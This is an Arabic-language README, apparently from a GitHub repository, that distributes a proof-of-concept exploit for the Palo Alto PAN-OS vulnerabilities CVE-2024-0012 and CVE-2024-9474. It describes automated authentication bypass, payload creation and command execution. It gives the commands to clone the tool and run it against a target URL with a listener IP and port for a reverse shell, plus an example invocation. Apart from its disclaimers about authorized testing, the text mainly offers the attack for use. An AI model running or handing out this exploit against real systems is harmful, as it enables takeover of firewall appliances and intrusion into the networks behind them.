
يستهدف هذا الدليل (PoC) الثغرات الأمنية في نظام Palo Alto PAN-OS، وتحديداً CVE-2024-0012 و CVE-2024-9474. تقوم هذه الأداة بأتمتة عملية الاستغلال، بما في ذلك إنشاء الحمولة (payload)، والتسليم المجزأ (chunked delivery)، وتنفيذ الأوامر بسلاسة.
هذا النص البرمجي التجريبي (PoC) يستهدف الثغرات الأمنية في نظام Palo Alto PAN-OS، وتحديداً CVE-2024-0012 و CVE-2024-9474، من خلال أتمتة عملية الاستغلال، بما في ذلك تجاوز المصادقة، وإنشاء الحمولة، والتوصيل المجزأ، وتنفيذ الأوامر بسلاسة.
⚠️ هذا النص البرمجي مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به غير قانوني.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: عنوان URL الهدف، بما في ذلك http أو https.<LISTENER_IP>: عنوان IP الخاص بك لمستمع الصدفة العكسية.<LISTENER_PORT>: المنفذ لمستمع الصدفة العكسية.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
احصل على التحليل الكامل والرؤى التقنية حول هذا الاستغلال التجريبي من خلال هذا المقال على Medium!
هذا الاستغلال التجريبي مخصص للأغراض التعليمية واختبار الأمن المصرح به فقط. الاستخدام غير المصرح به لهذه الأداة محظور تمامًا. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.